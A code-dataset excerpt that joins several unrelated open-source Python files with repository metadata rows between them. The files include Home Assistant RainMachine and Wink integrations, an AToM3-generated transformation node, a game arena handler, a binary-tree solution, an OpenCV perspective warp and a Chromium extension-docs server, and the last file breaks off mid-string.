DOMAIN as RAINMACHINE_DOMAIN,
PROVISION_SETTINGS,
RESTRICTIONS_CURRENT,
RESTRICTIONS_UNIVERSAL,
SENSOR_UPDATE_TOPIC,
RainMachineEntity,
)
_LOGGER = logging.getLogger(__name__)
# Sensor-type identifiers; used as dict keys below and matched again in
# RainMachineBinarySensor.async_update.
TYPE_FLOW_SENSOR = "flow_sensor"
TYPE_FREEZE = "freeze"
TYPE_FREEZE_PROTECTION = "freeze_protection"
TYPE_HOT_DAYS = "extra_water_on_hot_days"
TYPE_HOURLY = "hourly"
TYPE_MONTH = "month"
TYPE_RAINDELAY = "raindelay"
TYPE_RAINSENSOR = "rainsensor"
TYPE_WEEKDAY = "weekday"

# Map of sensor type -> (name, icon, enabled_by_default, api_category);
# unpacked in that order by async_setup_entry.
BINARY_SENSORS = {
    TYPE_FLOW_SENSOR: ("Flow Sensor", "mdi:water-pump", True, PROVISION_SETTINGS),
    TYPE_FREEZE: ("Freeze Restrictions", "mdi:cancel", True, RESTRICTIONS_CURRENT),
    TYPE_FREEZE_PROTECTION: (
        "Freeze Protection",
        "mdi:weather-snowy",
        True,
        RESTRICTIONS_UNIVERSAL,
    ),
    TYPE_HOT_DAYS: (
        "Extra Water on Hot Days",
        "mdi:thermometer-lines",
        True,
        RESTRICTIONS_UNIVERSAL,
    ),
    TYPE_HOURLY: ("Hourly Restrictions", "mdi:cancel", False, RESTRICTIONS_CURRENT),
    TYPE_MONTH: ("Month Restrictions", "mdi:cancel", False, RESTRICTIONS_CURRENT),
    TYPE_RAINDELAY: (
        "Rain Delay Restrictions",
        "mdi:cancel",
        False,
        RESTRICTIONS_CURRENT,
    ),
    TYPE_RAINSENSOR: (
        "Rain Sensor Restrictions",
        "mdi:cancel",
        False,
        RESTRICTIONS_CURRENT,
    ),
    TYPE_WEEKDAY: ("Weekday Restrictions", "mdi:cancel", False, RESTRICTIONS_CURRENT),
}
async def async_setup_entry(hass, entry, async_add_entities):
    """Set up RainMachine binary sensors based on a config entry."""
    rainmachine = hass.data[RAINMACHINE_DOMAIN][DATA_CLIENT][entry.entry_id]

    entities = []
    for sensor_type, attrs in BINARY_SENSORS.items():
        name, icon, enabled_by_default, api_category = attrs
        entities.append(
            RainMachineBinarySensor(
                rainmachine, sensor_type, name, icon, enabled_by_default, api_category
            )
        )

    async_add_entities(entities)
class RainMachineBinarySensor(RainMachineEntity, BinarySensorDevice):
    """A binary sensor implementation for a RainMachine device."""

    def __init__(
        self, rainmachine, sensor_type, name, icon, enabled_by_default, api_category
    ):
        """Initialize the sensor.

        ``api_category`` is the RainMachine API data bucket this sensor
        reads from (see BINARY_SENSORS).
        """
        super().__init__(rainmachine)

        self._api_category = api_category
        self._enabled_by_default = enabled_by_default
        self._icon = icon
        self._name = name
        self._sensor_type = sensor_type
        # Latest value pulled from the shared rainmachine data cache.
        self._state = None

    @property
    def entity_registry_enabled_default(self):
        """Determine whether an entity is enabled by default."""
        return self._enabled_by_default

    @property
    def icon(self) -> str:
        """Return the icon."""
        return self._icon

    @property
    def is_on(self):
        """Return the status of the sensor."""
        return self._state

    @property
    def should_poll(self):
        """Disable polling; updates arrive via the dispatcher signal."""
        return False

    @property
    def unique_id(self) -> str:
        """Return a unique, Home Assistant friendly identifier for this entity."""
        return "{0}_{1}".format(
            self.rainmachine.device_mac.replace(":", ""), self._sensor_type
        )

    async def async_added_to_hass(self):
        """Register callbacks and fetch the initial state."""

        @callback
        def update():
            """Update the state."""
            self.async_schedule_update_ha_state(True)

        self._dispatcher_handlers.append(
            async_dispatcher_connect(self.hass, SENSOR_UPDATE_TOPIC, update)
        )

        # Tell the shared client which API bucket this entity needs.
        await self.rainmachine.async_register_api_interest(self._api_category)

        await self.async_update()

    async def async_update(self):
        """Update the state from the shared rainmachine data cache."""
        if self._sensor_type == TYPE_FLOW_SENSOR:
            self._state = self.rainmachine.data[PROVISION_SETTINGS]["system"].get(
                "useFlowSensor"
            )
        elif self._sensor_type == TYPE_FREEZE:
            self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["freeze"]
        elif self._sensor_type == TYPE_FREEZE_PROTECTION:
            self._state = self.rainmachine.data[RESTRICTIONS_UNIVERSAL][
                "freezeProtectEnabled"
            ]
        elif self._sensor_type == TYPE_HOT_DAYS:
            self._state = self.rainmachine.data[RESTRICTIONS_UNIVERSAL][
                "hotDaysExtraWatering"
            ]
        elif self._sensor_type == TYPE_HOURLY:
            self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["hourly"]
        elif self._sensor_type == TYPE_MONTH:
            self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["month"]
        elif self._sensor_type == TYPE_RAINDELAY:
            self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["rainDelay"]
        elif self._sensor_type == TYPE_RAINSENSOR:
            self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["rainSensor"]
        elif self._sensor_type == TYPE_WEEKDAY:
            self._state = self.rainmachine.data[RESTRICTIONS_CURRENT]["weekDay"]

    async def async_will_remove_from_hass(self):
        """Disconnect dispatcher listeners and deregister API interest."""
        super().async_will_remove_from_hass()

        self.rainmachine.async_deregister_api_interest(self._api_category)
| 33.778443 | 86 | 0.660167 |
ace97861287160181302dbd1d69c68aa88557b77 | 10,964 | py | Python | UMLRT2Kiltera_MM/MT_pre__Capsule.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 3 | 2017-06-02T19:26:27.000Z | 2021-06-14T04:25:45.000Z | UMLRT2Kiltera_MM/MT_pre__Capsule.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 8 | 2016-08-24T07:04:07.000Z | 2017-05-26T16:22:47.000Z | UMLRT2Kiltera_MM/MT_pre__Capsule.py | levilucio/SyVOLT | 7526ec794d21565e3efcc925a7b08ae8db27d46a | [
"MIT"
] | 1 | 2019-10-31T06:00:23.000Z | 2019-10-31T06:00:23.000Z | """
__MT_pre__Capsule.py_____________________________________________________
Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)
Author: gehan
Modified: Sun Feb 15 10:22:14 2015
_________________________________________________________________________
"""
from ASGNode import *
from ATOM3Type import *
from ATOM3Text import *
from ATOM3String import *
from ATOM3Boolean import *
from graph_MT_pre__Capsule import *
class MT_pre__Capsule(ASGNode, ATOM3Type):
    """AToM3-generated LHS pattern node for the 'Capsule' metamodel element.

    Auto-generated code (see file header: DO NOT MODIFY DIRECTLY); the
    repeated assignments and duplicate dict keys below are artifacts of
    the generator.
    """

    def __init__(self, parent = None):
        ASGNode.__init__(self)
        ATOM3Type.__init__(self)
        self.superTypes = ['MT_pre__NamedElement', 'MT_pre__MetaModelElement_S']
        self.graphClass_ = graph_MT_pre__Capsule
        self.isGraphObjectVisual = True
        if(hasattr(self, '_setHierarchicalLink')):
            self._setHierarchicalLink(False)
        if(hasattr(self, '_setHierarchicalNode')):
            self._setHierarchicalNode(False)
        self.parent = parent
        # NOTE(generated): each matching-constraint attribute is assigned
        # three times with identical content; only the last takes effect.
        self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__cardinality=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__classtype=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_pre__name=ATOM3Text('\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node\'s attribute value by: attr_value.\n# You can access any attribute x of this node by: this[\'x\'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n', 80,15 )
        self.MT_label__=ATOM3String('', 20)
        self.MT_pivotOut__=ATOM3String('', 20)
        self.MT_pivotIn__=ATOM3String('', 20)
        self.MT_subtypeMatching__=ATOM3Boolean()
        self.MT_subtypeMatching__.setValue(('True', 0))
        self.MT_subtypeMatching__.config = 0
        # NOTE(generated): duplicate keys in this literal collapse; the dict
        # effectively holds one entry per distinct attribute name.
        self.generatedAttributes = {'MT_pre__cardinality': ('ATOM3Text', ),
                                    'MT_pre__cardinality': ('ATOM3Text', ),
                                    'MT_pre__cardinality': ('ATOM3Text', ),
                                    'MT_pre__classtype': ('ATOM3Text', ),
                                    'MT_pre__classtype': ('ATOM3Text', ),
                                    'MT_pre__classtype': ('ATOM3Text', ),
                                    'MT_pre__name': ('ATOM3Text', ),
                                    'MT_pre__name': ('ATOM3Text', ),
                                    'MT_pre__name': ('ATOM3Text', ),
                                    'MT_label__': ('ATOM3String', ),
                                    'MT_pivotOut__': ('ATOM3String', ),
                                    'MT_pivotIn__': ('ATOM3String', ),
                                    'MT_subtypeMatching__': ('ATOM3Boolean', ) }
        self.realOrder = ['MT_pre__cardinality','MT_pre__cardinality','MT_pre__cardinality','MT_pre__classtype','MT_pre__classtype','MT_pre__classtype','MT_pre__name','MT_pre__name','MT_pre__name','MT_label__','MT_pivotOut__','MT_pivotIn__','MT_subtypeMatching__']
        self.directEditing = [0,0,0,0,0,0,0,0,0,1,1,1,1]

    def clone(self):
        # Deep-ish copy: clone every attribute in realOrder, then let
        # ASGNode copy the remaining node bookkeeping.
        cloneObject = MT_pre__Capsule( self.parent )
        for atr in self.realOrder:
            cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )
        ASGNode.cloneActions(self, cloneObject)
        return cloneObject

    def copy(self, other):
        # Copy attribute values (by reference) from another instance.
        ATOM3Type.copy(self, other)
        for atr in self.realOrder:
            self.setAttrValue(atr, other.getAttrValue(atr) )
        ASGNode.copy(self, other)

    def preCondition (self, actionID, * params):
        # Delegate to the graphical object when one is attached.
        if self.graphObject_:
            return self.graphObject_.preCondition(actionID, params)
        else: return None

    def postCondition (self, actionID, * params):
        # Delegate to the graphical object when one is attached.
        if self.graphObject_:
            return self.graphObject_.postCondition(actionID, params)
        else: return None

    def preAction (self, actionID, * params):
        # Assign a fresh MT_label__ when the node is created.
        if actionID == self.CREATE:
            self.autoIncrLabel(params)
        if self.graphObject_:
            return self.graphObject_.preAction(actionID, params)
        else: return None

    def postAction (self, actionID, * params):
        # Delegate to the graphical object when one is attached.
        if self.graphObject_:
            return self.graphObject_.postAction(actionID, params)
        else: return None

    def QOCA(self, params):
        """
        QOCA Constraint Template
        NOTE: DO NOT select a POST/PRE action trigger
        Constraints will be added/removed in a logical manner by other mechanisms.
        """
        return  # <---- Remove this to use QOCA
        """ Get the high level constraint helper and solver """
        from Qoca.atom3constraints.OffsetConstraints import OffsetConstraints
        oc = OffsetConstraints(self.parent.qocaSolver)
        """
        Example constraint, see Kernel/QOCA/atom3constraints/OffsetConstraints.py
        For more types of constraints
        """
        oc.fixedWidth(self.graphObject_, self.graphObject_.sizeX)
        oc.fixedHeight(self.graphObject_, self.graphObject_.sizeY)

    def autoIncrLabel(self, params):
        #===============================================================================
        # Auto increment the label
        #===============================================================================
        # If there is already one, ignore
        if not self.MT_label__.isNone(): return

        # Get the maximum label of all MT_pre__ elements
        label = 0
        for nt in self.parent.ASGroot.listNodes:
            if nt.startswith('MT_pre__'):
                for node in self.parent.ASGroot.listNodes[nt]:
                    currLabel = 0
                    try:
                        currLabel = int(node.MT_label__.getValue())
                    except:
                        pass
                    if currLabel > label:
                        label = currLabel

        # The label of this instance will be the max label + 1
        self.MT_label__.setValue(str(label + 1))
| 78.877698 | 630 | 0.58008 |
ace97898abaed617c2c8ea00cbb3a39f556e1677 | 1,219 | py | Python | server/src/project_n/app/game/gatenodeapp/arean.py | isuhao/gamein9miao | df8624b0e3223a12eb1dc833ce8fa89fd715aa5b | [
"MIT"
] | 1 | 2018-04-18T02:38:14.000Z | 2018-04-18T02:38:14.000Z | server/src/project_n/app/game/gatenodeapp/arean.py | isuhao/gamein9miao | df8624b0e3223a12eb1dc833ce8fa89fd715aa5b | [
"MIT"
] | null | null | null | server/src/project_n/app/game/gatenodeapp/arean.py | isuhao/gamein9miao | df8624b0e3223a12eb1dc833ce8fa89fd715aa5b | [
"MIT"
] | null | null | null | #coding:utf8
'''
Created on 2013-10-25
@author: lan (www.9miao.com)
'''
from app.game.gatenodeservice import remoteserviceHandle
from app.game.appinterface import arena
import json
@remoteserviceHandle
def GetJingJiInfo_3700(dynamicId, request_proto):
    """Fetch arena info for a character (original doc: 获取竞技场信息)."""
    params = json.loads(request_proto)
    character_id = params.get('characterId')
    result = arena.GetJingJiInfo3700(dynamicId, character_id)
    return json.dumps(result)
@remoteserviceHandle
def ArenaBattle_3704(dynamicId, request_proto):
    """Run an arena battle against another character (original doc: 竞技场战斗)."""
    params = json.loads(request_proto)
    character_id = params.get('characterId')
    target_id = params.get('tid')
    outcome = arena.ArenaBattle_3704(dynamicId, character_id, target_id)
    response = {
        'result': outcome.get('result', False),
        'message': outcome.get('message', ''),
    }
    payload = outcome.get('data')
    if payload:
        battle = payload.get('fight')
        # Serialize the fight, then attach the result and set data to the
        # same dict that 'data' points at.
        fightdata = battle.formatFightData()
        response['data'] = fightdata
        fightdata['battleResult'] = battle.battleResult
        fightdata['setData'] = payload.get('setData')
    return json.dumps(response)
| 29.731707 | 72 | 0.699754 |
ace97b5fba93fd62681f086cd6719ff3ecc43e56 | 2,314 | py | Python | homeassistant/components/garage_door/wink.py | magas0/home-assistant | 3c9e4934946ce99f5193ca550296034e86337997 | [
"MIT"
] | 1 | 2016-07-14T05:20:54.000Z | 2016-07-14T05:20:54.000Z | app/bower_components/home-assistant-dev/homeassistant/components/garage_door/wink.py | EkoHub/CustomizableWalkThroughTourElement | 0a4ae793a1e031c9bd042b0e8ffef3be96b7c1b0 | [
"BSD-3-Clause"
] | null | null | null | app/bower_components/home-assistant-dev/homeassistant/components/garage_door/wink.py | EkoHub/CustomizableWalkThroughTourElement | 0a4ae793a1e031c9bd042b0e8ffef3be96b7c1b0 | [
"BSD-3-Clause"
] | null | null | null | """
Support for Wink garage doors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/garage_door.wink/
"""
import logging
from homeassistant.components.garage_door import GarageDoorDevice
from homeassistant.const import CONF_ACCESS_TOKEN, ATTR_BATTERY_LEVEL
# Pinned python-wink version; installed on demand by Home Assistant's
# dependency loader when this platform is set up.
REQUIREMENTS = ['python-wink==0.7.6']
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the Wink garage door platform.

    Without discovery info a bearer token must be available in the
    config; otherwise setup aborts with an error log entry.
    """
    import pywink

    if discovery_info is None:
        access_token = config.get(CONF_ACCESS_TOKEN)
        if access_token is None:
            logging.getLogger(__name__).error(
                "Missing wink access_token. "
                "Get one at https://winkbearertoken.appspot.com/")
            return
        pywink.set_bearer_token(access_token)

    doors = pywink.get_garage_doors()
    add_devices(WinkGarageDoorDevice(door) for door in doors)
class WinkGarageDoorDevice(GarageDoorDevice):
    """Representation of a Wink garage door."""

    def __init__(self, wink):
        """Initialize the garage door."""
        self.wink = wink
        # Battery level captured once at setup; a falsy value means the
        # device does not report one.
        self._battery = self.wink.battery_level

    @property
    def unique_id(self):
        """Return the ID of this wink garage door."""
        return "%s.%s" % (self.__class__, self.wink.device_id())

    @property
    def name(self):
        """Return the name of the garage door if any."""
        return self.wink.name()

    def update(self):
        """Refresh the cached door state from the Wink service."""
        self.wink.update_state()

    @property
    def is_closed(self):
        """Return true if door is closed."""
        current_state = self.wink.state()
        return current_state == 0

    @property
    def available(self):
        """True when the device is reachable."""
        return self.wink.available

    def close_door(self):
        """Close the door."""
        self.wink.set_state(0)

    def open_door(self):
        """Open the door."""
        self.wink.set_state(1)

    @property
    def device_state_attributes(self):
        """Return the state attributes."""
        if not self._battery:
            return None
        return {ATTR_BATTERY_LEVEL: self._battery_level}

    @property
    def _battery_level(self):
        """Return the current battery level as a percentage."""
        return self.wink.battery_level * 100
ace97b6e48c3d8d7d2c00a7b0f8ab144037a01ee | 611 | py | Python | June 2021/Construct Binary Tree from Preorder and Inorder Traversal.py | parikshitgupta1/leetcode | eba6c11740dc7597204af127c0f4c2163376294f | [
"MIT"
] | null | null | null | June 2021/Construct Binary Tree from Preorder and Inorder Traversal.py | parikshitgupta1/leetcode | eba6c11740dc7597204af127c0f4c2163376294f | [
"MIT"
] | null | null | null | June 2021/Construct Binary Tree from Preorder and Inorder Traversal.py | parikshitgupta1/leetcode | eba6c11740dc7597204af127c0f4c2163376294f | [
"MIT"
class Solution:
    """
    @param preorder : A list of integers that preorder traversal of a tree
    @param inorder : A list of integers that inorder traversal of a tree
    @return : Root of a tree
    """

    def buildTree(self, preorder, inorder):
        """Rebuild a binary tree from its preorder and inorder traversals.

        Improvement over the naive version: instead of re-slicing both
        lists at every level (O(n^2) time and memory overall), each
        value's position in `inorder` is precomputed once and the
        recursion only passes index bounds, giving O(n) time.
        Assumes all node values are distinct.  Returns None for empty
        input.
        """
        if not inorder:
            return None
        # value -> position in the inorder sequence (O(1) root lookup).
        inorder_pos = {value: i for i, value in enumerate(inorder)}
        # Cursor into `preorder`; one-element list so the nested helper
        # can mutate it.
        next_root = [0]

        def build(lo, hi):
            # Empty inorder window => no subtree on this side.
            if lo > hi:
                return None
            root_value = preorder[next_root[0]]
            next_root[0] += 1
            root = TreeNode(root_value)
            split = inorder_pos[root_value]
            # Left subtree must be built first: its nodes come next in
            # the preorder sequence.
            root.left = build(lo, split - 1)
            root.right = build(split + 1, hi)
            return root

        return build(0, len(inorder) - 1)
| 40.733333 | 86 | 0.635025 |
ace97d765c5eb5f6a40e2cc39bf59b8210a306c9 | 523 | py | Python | test/data/testcase/browser/browser_01.py | TE-ToshiakiTanaka/stve | 30b1a0c9b8b20f7059999b0b25b16d6b43aa935c | [
"MIT"
] | null | null | null | test/data/testcase/browser/browser_01.py | TE-ToshiakiTanaka/stve | 30b1a0c9b8b20f7059999b0b25b16d6b43aa935c | [
"MIT"
] | null | null | null | test/data/testcase/browser/browser_01.py | TE-ToshiakiTanaka/stve | 30b1a0c9b8b20f7059999b0b25b16d6b43aa935c | [
"MIT"
] | null | null | null | import os
import sys
import time
from stve.log import LOG as L
from stve.script import StveTestCase
class TestCase(StveTestCase):
    """Smoke test verifying that the browser service is registered."""

    # NOTE: the redundant pass-through __init__ was removed; the base
    # class constructor is used directly.

    @classmethod
    def setUpClass(cls):
        L.info("*** Start TestCase : %s *** " % __file__)

    def test(self):
        # The stve.browser plugin must appear among the loaded services.
        self.assertIn("stve.browser", self.service.keys())

    @classmethod
    def tearDownClass(cls):
        L.info("*** End TestCase : %s *** " % __file__)
| 22.73913 | 62 | 0.629063 |
ace97dc56b55271acedbdb277a2927860eed0cc7 | 1,677 | py | Python | api/transform.py | wysockipiotr/deep-scanner | d80799a3790d51a90374b8904aebc8e12a1e783e | [
"MIT"
] | 12 | 2019-12-06T12:18:01.000Z | 2021-12-27T04:47:38.000Z | api/transform.py | wysockipiotr/deep-scanner | d80799a3790d51a90374b8904aebc8e12a1e783e | [
"MIT"
] | 4 | 2020-11-13T18:33:36.000Z | 2022-02-10T00:36:55.000Z | api/transform.py | wysockipiotr/deep-scanner | d80799a3790d51a90374b8904aebc8e12a1e783e | [
"MIT"
] | 3 | 2020-09-27T01:43:54.000Z | 2021-07-01T18:01:19.000Z | import numpy as np
import cv2
def distance(a, b):
    """Euclidean distance between points `a` and `b`."""
    diff = a - b
    return np.sqrt(np.dot(diff, diff))
def clockwise_sorted(points: np.ndarray) -> np.ndarray:
    """Order four 2-D points clockwise from the top left.

    Result order: top-left, top-right, bottom-right, bottom-left.
    """
    assert points.shape[0] == 4, "Four points are required"

    # Split into the two topmost and two bottommost points first...
    by_y = points[points[:, 1].argsort()]
    top, bottom = by_y[:2], by_y[2:]
    # ...then resolve left/right inside each pair by x coordinate.
    tl, tr = top[top[:, 0].argsort()]
    bl, br = bottom[bottom[:, 0].argsort()]
    return np.array([tl, tr, br, bl], dtype=np.float32)
def four_point_warp(image: np.ndarray, contour_points: np.ndarray) -> np.ndarray:
    """Warp `image` so the quadrilateral `contour_points` fills the frame.

    The contour is expected to already be ordered TL, TR, BR, BL;
    clockwise_sorted() is intentionally not applied here.
    """
    tl, tr, br, bl = contour_points

    # Output size: the larger of the opposing edge lengths on each axis.
    width = int(max(distance(tl, tr), distance(bl, br)))
    height = int(max(distance(tl, bl), distance(tr, br)))

    target = np.array(
        [
            [0, 0],
            [width - 1, 0],
            [width - 1, height - 1],
            [0, height - 1],
        ],
        dtype=np.float32,
    )
    matrix = cv2.getPerspectiveTransform(contour_points, target)
    return cv2.warpPerspective(image, matrix, (width, height))
| 31.055556 | 94 | 0.646392 |
ace97f28f0742202e76159325ad31a2b84562b96 | 14,975 | py | Python | chrome/common/extensions/docs/server/chromeextensionsdocs.py | Scopetta197/chromium | b7bf8e39baadfd9089de2ebdc0c5d982de4a9820 | [
"BSD-3-Clause"
] | 212 | 2015-01-31T11:55:58.000Z | 2022-02-22T06:35:11.000Z | chrome/common/extensions/docs/server/chromeextensionsdocs.py | 1065672644894730302/Chromium | 239dd49e906be4909e293d8991e998c9816eaa35 | [
"BSD-3-Clause"
] | 5 | 2015-03-27T14:29:23.000Z | 2019-09-25T13:23:12.000Z | chrome/common/extensions/docs/server/chromeextensionsdocs.py | 1065672644894730302/Chromium | 239dd49e906be4909e293d8991e998c9816eaa35 | [
"BSD-3-Clause"
] | 221 | 2015-01-07T06:21:24.000Z | 2022-02-11T02:51:12.000Z | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cgi
import logging
import re
import os
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import memcache
from google.appengine.api import urlfetch
# TODO(nickbaum): unit tests
# TODO(nickbaum): is this the right way to do constants?
class Channel():
  """A Chrome release channel plus the Omaha tag used to query its version."""

  def __init__(self, name, tag):
    self.name = name
    self.tag = tag

  # TODO(nickbaum): unit test this
  def matchPath(self, path):
    """Return True if `path` lives under this channel's subdirectory."""
    # Bug fix: this previously returned the undefined names `true`/`false`,
    # which raised NameError on every call; return real booleans instead.
    match = "/" + self.name + "/"
    return path[0:len(match)] == match
# Channel singletons.  The tag is the Omaha "tag" value sent when asking the
# update service for the channel's current version number.
Channel.DEV = Channel("dev", "2.0-dev")
Channel.BETA = Channel("beta", "1.1-beta")
Channel.STABLE = Channel("stable", "")
Channel.CHANNELS = [Channel.DEV, Channel.BETA, Channel.STABLE]
# Trunk is not a released channel and therefore has no Omaha tag.
Channel.TRUNK = Channel("trunk", "")
Channel.DEFAULT = Channel.STABLE

# Seconds that fetched pages and branch numbers stay in memcache.
DEFAULT_CACHE_TIME = 300
class MainPage(webapp.RequestHandler):
  """Serves extension docs by proxying src.chromium.org through memcache."""

  # get page from memcache, or else fetch it from src
  def get(self):
    """Serve the requested doc page, filling the cache on a miss."""
    path = os.path.realpath(os.path.join('/', self.request.path))
    # special path to invoke the unit tests
    # TODO(nickbaum): is there a less ghetto way to invoke the unit test?
    if path == "/test":
      self.unitTest()
      return
    # if root, redirect to index.html
    # TODO(nickbaum): this doesn't handle /chrome/extensions/trunk, etc
    if (path == "/chrome/extensions") or (path == "chrome/extensions/"):
      self.redirect("/chrome/extensions/index.html")
      return
    # else remove prefix
    if(path[:18] == "/chrome/extensions"):
      path = path[18:]
    # TODO(nickbaum): there's a subtle bug here: if there are two instances of the app,
    # their default caches will override each other. This is bad!
    result = memcache.get(path)
    if result is None:
      logging.info("Cache miss: " + path)
      url = self.getSrcUrl(path)
      # Trunk URLs and the favicon have no "%s" branch placeholder to fill.
      if (url[1] is not Channel.TRUNK) and (url[0] != "http://src.chromium.org/favicon.ico"):
        branch = self.getBranch(url[1])
        url = url[0] % branch
      else:
        url = url[0]
      logging.info("Path: " + self.request.path)
      logging.info("Url: " + url)
      try:
        result = urlfetch.fetch(url)
        if result.status_code != 200:
          logging.error("urlfetch failed: " + url)
          # TODO(nickbaum): what should we do when the urlfetch fails?
        # Files inside of samples should be rendered with content-type
        # text/plain so that their source is visible when linked to. The only
        # types we should serve as-is are images.
        if ((path.startswith("/examples") or
             path.startswith("/stable/examples") or
             path.startswith("/beta/examples") or
             path.startswith("/dev/examples") or
             path.startswith("/trunk/examples")) and
            not (result.headers['content-type'].startswith('image/') or
                 result.headers['Content-Type'].startswith('image/'))):
          result.headers['content-type'] = 'text/plain'
      except:
        logging.error("urlfetch failed: " + url)
        # TODO(nickbaum): what should we do when the urlfetch fails?
      try:
        if not memcache.add(path, result, DEFAULT_CACHE_TIME):
          logging.error("Memcache set failed.")
      except:
        logging.error("Memcache set failed.")
    # Replay the cached/fetched response (headers and body) to the client.
    for key in result.headers:
      self.response.headers[key] = result.headers[key]
    self.response.out.write(result.content)

  def head(self):
    """HEAD is handled identically to GET (App Engine strips the body)."""
    self.get()

  # get the src url corresponding to the request
  # returns a tuple of the url and the branch
  # this function is the only part that is unit tested
  def getSrcUrl(self, path):
    """Map a request path to [source URL (maybe with %s branch slot), channel]."""
    # from the path they provided, figure out which channel they requested
    # TODO(nickbaum) clean this logic up
    # find the first subdirectory of the path
    path = path.split('/', 2)
    url = "http://src.chromium.org/viewvc/chrome/"
    channel = None
    # if there's no subdirectory, choose the default channel
    # otherwise, figure out if the subdirectory corresponds to a channel
    if len(path) == 2:
      path.append("")
    if path[1] == "":
      channel = Channel.DEFAULT
      if(Channel.DEFAULT == Channel.TRUNK):
        url = url + "trunk/src/chrome/"
      else:
        url = url + "branches/%s/src/chrome/"
      path = ""
    elif path[1] == Channel.TRUNK.name:
      url = url + "trunk/src/chrome/"
      channel = Channel.TRUNK
      path = path[2]
    else:
      # otherwise, run through the different channel options
      for c in Channel.CHANNELS:
        if(path[1] == c.name):
          channel = c
          url = url + "branches/%s/src/chrome/"
          path = path[2]
          break
      # if the subdirectory doesn't correspond to a channel, use the default
      if channel is None:
        channel = Channel.DEFAULT
        if(Channel.DEFAULT == Channel.TRUNK):
          url = url + "trunk/src/chrome/"
        else:
          url = url + "branches/%s/src/chrome/"
        if path[2] != "":
          path = path[1] + "/" + path[2]
        else:
          path = path[1]
    # special cases
    # TODO(nickbaum): this is super cumbersome to maintain
    if path == "third_party/jstemplate/jstemplate_compiled.js":
      url = url + path
    elif path.startswith("api/") and path.endswith(".json"):
      url = url + "common/extensions/" + path
    elif path == "favicon.ico":
      url = "http://src.chromium.org/favicon.ico"
    else:
      if path == "":
        path = "index.html"
      url = url + "common/extensions/docs/" + path
    return [url, channel]

  # get the current version number for the channel requested (dev, beta or stable)
  # TODO(nickbaum): move to Channel object
  def getBranch(self, channel):
    """Return (and memcache) the branch number Omaha reports for `channel`."""
    branch = memcache.get(channel.name)
    if branch is None:
      # query Omaha to figure out which version corresponds to this channel
      postdata = """<?xml version="1.0" encoding="UTF-8"?>
<o:gupdate xmlns:o="http://www.google.com/update2/request" protocol="2.0" testsource="crxdocs">
